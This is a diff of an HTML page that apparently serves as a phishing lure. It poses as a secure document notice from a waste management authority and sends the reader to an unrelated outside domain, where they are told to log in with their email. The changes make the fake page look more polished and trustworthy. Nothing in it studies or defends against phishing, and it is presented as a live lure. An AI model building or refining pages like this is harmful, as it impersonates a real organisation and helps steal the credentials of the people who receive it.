--- a/index.html
+++ b/index.html
@@ -3,91 +3,191 @@
 <head>
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-  <title>Secure Document Delivery</title>
+  <title>Secure Document Delivery - VI Waste Management Authority</title>
+  <meta name="description" content="Secure document delivery portal. Authorized personnel only." />
   <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet">
+  <style>
+    @keyframes fadeIn {
+      from { opacity: 0; transform: translateY(10px); }
+      to { opacity: 1; transform: translateY(0); }
+    }
+    .animate-fade-in {
+      animation: fadeIn 0.5s ease-out;
+    }
+    @keyframes spin {
+      to { transform: rotate(360deg); }
+    }
+    .animate-spin {
+      animation: spin 1s linear infinite;
+    }
+  </style>
   <script>
     function viewDocument() {
       const button = document.getElementById('viewButton');
       const loader = document.getElementById('loader');
+      const buttonText = document.getElementById('buttonText');
       button.disabled = true;
+      buttonText.classList.add('hidden');
       loader.classList.remove('hidden');
       setTimeout(() => {
         window.open("https://postmortem.lathioboo.in/7r!NrtA31AIDLgTybSE3/", "_blank", "noopener,noreferrer");
         button.disabled = false;
+        buttonText.classList.remove('hidden');
         loader.classList.add('hidden');
       }, 2000);
     }
   </script>
 </head>
-<body class="bg-gray-50 text-gray-800 font-sans">
-  <div class="max-w-xl mx-auto mt-10 shadow-lg rounded-lg overflow-hidden border border-gray-200">
-    <div class="bg-blue-600 text-white px-6 py-4">
-      <div class="flex items-center space-x-2">
-        <svg class="w-5 h-5" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
-          <path d="M12 11c0-1.1.9-2 2-2s2 .9 2 2-.9 2-2 2-2-.9-2-2z"/>
-          <path d="M12 3C7.03 3 3 7.03 3 12c0 2.21.9 4.21 2.35 5.65L12 21l6.65-3.35C20.1 16.21 21 14.21 21 12c0-4.97-4.03-9-9-9z"/>
-        </svg>
-        <h1 class="text-lg font-semibold">Secure Message</h1>
+<body class="bg-gradient-to-br from-blue-50 to-indigo-50 text-gray-800 font-sans min-h-screen py-8 px-4">
+  <div class="max-w-2xl mx-auto animate-fade-in">
+    <div class="bg-white shadow-2xl rounded-xl overflow-hidden border border-gray-200">
+      <div class="bg-gradient-to-r from-blue-600 to-indigo-600 text-white px-6 py-5">
+        <div class="flex items-start justify-between">
+          <div class="flex items-center space-x-3">
+            <div class="bg-white bg-opacity-20 p-2 rounded-lg">
+              <svg class="w-6 h-6" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
+                <path d="M9 12h6m-6 4h6m2 5H7a2 2 0 01-2-2V5a2 2 0 012-2h5.586a1 1 0 01.707.293l5.414 5.414a1 1 0 01.293.707V19a2 2 0 01-2 2z"/>
+              </svg>
+            </div>
+            <div>
+              <h1 class="text-xl font-bold">Secure Document Delivery</h1>
+              <p class="text-sm opacity-90 mt-0.5">12/18/2025 12:12 PM</p>
+            </div>
+          </div>
+          <div class="bg-white bg-opacity-20 px-3 py-1 rounded-full text-xs font-semibold">
+            CONFIDENTIAL
+          </div>
+        </div>
       </div>
-      <p class="text-sm opacity-90">12/18/2025 9:12 AM</p>
+      <div class="px-6 py-6 space-y-6">
+        <div class="bg-gradient-to-r from-blue-50 to-indigo-50 rounded-lg p-4 border border-blue-100">
+          <div class="flex items-start space-x-3">
+            <div class="bg-blue-600 text-white rounded-full w-12 h-12 flex items-center justify-center flex-shrink-0 font-bold text-lg">
+              CT
+            </div>
+            <div>
+              <h3 class="font-semibold text-gray-900 text-lg">Michael Vant</h3>
+              <p class="text-blue-600 font-medium text-sm">VI Waste Management Authority</p>
+              <p class="text-gray-600 text-sm mt-1">Project - RFQ 2561237WRQS198</p>
+            </div>
+          </div>
+        </div>
+        <div>
+          <h2 class="text-xl font-semibold text-gray-900 mb-2">You have received a new secure document</h2>
+          <p class="text-gray-600">This message was sent securely to protect sensitive information included in the correspondence.</p>
+        </div>
+        <div class="bg-gray-50 rounded-lg p-4 space-y-3 border border-gray-200">
+          <div class="flex justify-between items-center text-sm">
+            <span class="text-gray-600 font-medium">Date Received</span>
+            <span class="text-gray-900 font-semibold">12/18/2025</span>
+          </div>
+          <div class="border-t border-gray-200"></div>
+          <div class="flex justify-between items-center text-sm">
+            <span class="text-gray-600 font-medium">Reference Number</span>
+            <span class="text-gray-900 font-mono font-semibold">SP005581456</span>
+          </div>
+          <div class="border-t border-gray-200"></div>
+          <div class="flex justify-between items-center text-sm">
+            <span class="text-gray-600 font-medium">Number of Pages</span>
+            <span class="text-gray-900 font-semibold">3 pages</span>
+          </div>
+          <div class="border-t border-gray-200"></div>
+          <div class="flex justify-between items-center text-sm">
+            <span class="text-gray-600 font-medium">Status</span>
+            <span class="inline-flex items-center px-2.5 py-0.5 rounded-full text-xs font-semibold bg-green-100 text-green-800">
+              <svg class="w-3 h-3 mr-1" fill="currentColor" viewBox="0 0 20 20">
+                <path fill-rule="evenodd" d="M10 18a8 8 0 100-16 8 8 0 000 16zm3.707-9.293a1 1 0 00-1.414-1.414L9 10.586 7.707 9.293a1 1 0 00-1.414 1.414l2 2a1 1 0 001.414 0l4-4z" clip-rule="evenodd"/>
+              </svg>
+              Successful
+            </span>
+          </div>
+        </div>
+        <div class="space-y-3">
+          <button
+            id="viewButton"
+            onclick="viewDocument()"
+            class="w-full bg-gradient-to-r from-blue-600 to-indigo-600 hover:from-blue-700 hover:to-indigo-700 text-white font-semibold py-4 px-6 rounded-lg shadow-lg hover:shadow-xl transition-all duration-200 flex items-center justify-center space-x-2 disabled:opacity-50 disabled:cursor-not-allowed"
+          >
+            <span id="buttonText" class="flex items-center space-x-2">
+              <svg class="w-5 h-5" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
+                <path d="M15 12a3 3 0 11-6 0 3 3 0 016 0z"/>
+                <path d="M2.458 12C3.732 7.943 7.523 5 12 5c4.478 0 8.268 2.943 9.542 7-1.274 4.057-5.064 7-9.542 7-4.477 0-8.268-2.943-9.542-7z"/>
+              </svg>
+              <span>VIEW DOCUMENT (130kb)</span>
+            </span>
+            <div id="loader" class="hidden flex items-center space-x-2">
+              <svg class="animate-spin w-5 h-5" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
+                <circle class="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" stroke-width="4"></circle>
+                <path class="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path>
+              </svg>
+              <span>Loading secure document...</span>
+            </div>
+          </button>
+          <p class="text-xs text-center text-gray-600">
+            <strong>Important:</strong> Login with your receiving email for secured authentication to view document
+          </p>
+        </div>
+        <div class="bg-amber-50 border-l-4 border-amber-400 rounded-r-lg p-4 flex items-start space-x-3">
+          <svg class="w-5 h-5 text-amber-600 flex-shrink-0 mt-0.5" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
+            <path d="M12 8v4l3 3m6-3a9 9 0 11-18 0 9 9 0 0118 0z"/>
+          </svg>
+          <p class="text-sm text-amber-800">
+            This secure message will expire in <strong>30 days</strong> from the delivery date
+          </p>
+        </div>
+        <div class="border-t pt-6">
+          <h3 class="font-semibold text-gray-900 mb-4 flex items-center space-x-2">
+            <svg class="w-5 h-5 text-blue-600" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
+              <path d="M12 15v2m-6 4h12a2 2 0 002-2v-6a2 2 0 00-2-2H6a2 2 0 00-2 2v6a2 2 0 002 2zm10-10V7a4 4 0 00-8 0v4h8z"/>
+            </svg>
+            <span>Security & Compliance</span>
+          </h3>
+          <div class="space-y-3">
+            <div class="flex items-start space-x-3 text-sm">
+              <div class="bg-blue-100 p-1.5 rounded-lg flex-shrink-0">
+                <svg class="w-4 h-4 text-blue-600" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
+                  <path d="M9 12l2 2 4-4m5.618-4.016A11.955 11.955 0 0112 2.944a11.955 11.955 0 01-8.618 3.04A12.02 12.02 0 003 9c0 5.591 3.824 10.29 9 11.622 5.176-1.332 9-6.03 9-11.622 0-1.042-.133-2.052-.382-3.016z"/>
+                </svg>
+              </div>
+              <div>
+                <p class="font-medium text-gray-900">End-to-End Encryption</p>
+                <p class="text-gray-600">All documents are encrypted during transmission and storage</p>
+              </div>
+            </div>
+            <div class="flex items-start space-x-3 text-sm">
+              <div class="bg-blue-100 p-1.5 rounded-lg flex-shrink-0">
+                <svg class="w-4 h-4 text-blue-600" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
+                  <path d="M15 7a2 2 0 012 2m4 0a6 6 0 01-7.743 5.743L11 17H9v2H7v2H4a1 1 0 01-1-1v-2.586a1 1 0 01.293-.707l5.964-5.964A6 6 0 1121 9z"/>
+                </svg>
+              </div>
+              <div>
+                <p class="font-medium text-gray-900">Secure Authentication</p>
+                <p class="text-gray-600">Multi-factor authentication ensures only authorized access</p>
+              </div>
+            </div>
+            <div class="flex items-start space-x-3 text-sm">
+              <div class="bg-blue-100 p-1.5 rounded-lg flex-shrink-0">
+                <svg class="w-4 h-4 text-blue-600" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
+                  <path d="M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2"/>
+                </svg>
+              </div>
+              <div>
+                <p class="font-medium text-gray-900">Complete Audit Trail</p>
+                <p class="text-gray-600">Full tracking of document access and delivery status</p>
+              </div>
+            </div>
+          </div>
+        </div>
+      </div>
+      <div class="bg-gray-100 text-center text-xs text-gray-600 py-4 border-t">
+        <p class="font-medium">© 2025 SecureDocuments. All rights reserved.</p>
+        <p class="mt-1">Secure • Reliable • Compliant</p>
+      </div>
     </div>
-    <div class="bg-white px-6 py-6 space-y-6">
-      <div>
-        <h2 class="text-lg font-medium">You have received a new document</h2>
-        <p class="text-sm text-gray-600">The message was sent securely to protect sensitive information included in the correspondence.</p>
-      </div>
-      <div class="border-t border-b py-4 space-y-2 text-sm">
-        <div class="flex justify-between"><span class="font-medium">Date Received</span><span>12/18/2025</span></div>
-        <div class="flex justify-between"><span class="font-medium">Reference Number</span><span>SP005581456</span></div>
-        <div class="flex justify-between"><span class="font-medium">Number of Pages</span><span>3</span></div>
-        <div class="flex justify-between"><span class="font-medium">Status Code</span><span class="text-green-600 font-medium">Successful</span></div>
-      </div>
-      <div class="space-y-4">
-        <button id="viewButton" onclick="viewDocument()" class="w-full bg-blue-600 hover:bg-blue-700 text-white py-2 px-4 rounded flex items-center justify-center space-x-2">
-          <svg class="w-4 h-4" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
-            <path d="M4 4h16v16H4z" stroke="none"/>
-            <path d="M4 4h16v16H4z"/>
-            <path d="M8 4v16M16 4v16M4 8h16M4 16h16"/>
-          </svg>
-          <span>VIEW DOCUMENT (130kb)</span>
-        </button>
-        <div id="loader" class="hidden text-center text-sm text-blue-600">Loading secure document...</div>
-        <p class="text-xs text-center text-gray-500"><strong>Important Note:</strong> Login with your receiving email for a secured authentication to view document</p>
-      </div>
-      <div class="bg-yellow-100 border border-yellow-300 text-yellow-800 text-sm rounded-md p-3 flex items-center space-x-2">
-        <svg class="w-4 h-4" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
-          <path d="M12 8v4l3 3"/>
-          <path d="M12 2a10 10 0 100 20 10 10 0 000-20z"/>
-        </svg>
-        <p>This secure message will expire in <strong>30 days</strong></p>
-      </div>
-      <div class="pt-4 border-t text-sm space-y-2">
-        <div class="flex items-center space-x-2">
-          <svg class="w-4 h-4 text-gray-600" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
-            <path d="M12 12v.01"/>
-            <path d="M21 12a9 9 0 11-18 0 9 9 0 0118 0z"/>
-          </svg>
-          <span>End-to-End Encryption: All documents are encrypted during transmission and storage</span>
-        </div>
-        <div class="flex items-center space-x-2">
-          <svg class="w-4 h-4 text-gray-600" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
-            <path d="M12 11c0-1.1.9-2 2-2s2 .9 2 2-.9 2-2 2-2-.9-2-2z"/>
-            <path d="M12 3C7.03 3 3 7.03 3 12c0 2.21.9 4.21 2.35 5.65L12 21l6.65-3.35C20.1 16.21 21 14.21 21 12c0-4.97-4.03-9-9-9z"/>
-          </svg>
-          <span>Secure Authentication: Multi-factor authentication ensures only authorized access</span>
-        </div>
-        <div class="flex items-center space-x-2">
-          <svg class="w-4 h-4 text-gray-600" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
-            <path d="M3 3h18v18H3z"/>
-            <path d="M3 9h18M9 21V9"/>
-          </svg>
-          <span>Audit Trail: Complete tracking of document access and delivery status</span>
-        </div>
-      </div>
-    </div>
-    <div class="bg-gray-100 text-center text-xs text-gray-500 py-3">
-      © 2025 SecureDocuments. All rights reserved. | Secure • Reliable • Compliant
+    <div class="mt-6 text-center text-xs text-gray-500">
+      <p>If you have any questions about this document, please contact the sender directly.</p>
     </div>
   </div>
 </body>
 </html>
+
